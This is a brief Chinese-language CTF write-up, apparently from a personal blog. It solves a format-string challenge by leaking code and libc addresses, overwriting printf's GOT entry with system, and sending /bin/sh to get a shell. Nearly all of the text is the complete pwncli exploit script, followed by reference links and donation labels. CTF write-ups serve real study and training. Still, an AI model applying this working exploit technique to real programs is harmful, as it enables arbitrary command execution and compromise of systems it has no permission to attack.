解题思路
简单的printf,修改printf@got为system然后再输入/bin/sh获取shell
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
from pwncli import *
cli_script()
p = gift['io']
e = gift['elf']
libc = gift['libc']
p.sendline("%41$p,%43$p")
msg = p.recvline()
code_addr, libc_addr = msg.split(b",")
code_base_addr = int16(code_addr.decode()) - e.sym['main'] - 74
libc_base_addr = int16(libc_addr.decode()) - libc.sym['__libc_start_main'] - 240
e.address = code_base_addr
libc.address = libc_base_addr
log_address("code_base_addr", code_base_addr)
payload = fmtstr_payload(offset=6, writes={e.got['printf']:libc.sym['system']}, write_size="short", write_size_max="short")
p.sendline(payload)
sleep(1)
p.sendline("/bin/sh")
p.interactive()
|
引用与参考
1、My Blog
2、Ctf Wiki
3、pwncli
roderick
支付宝
微信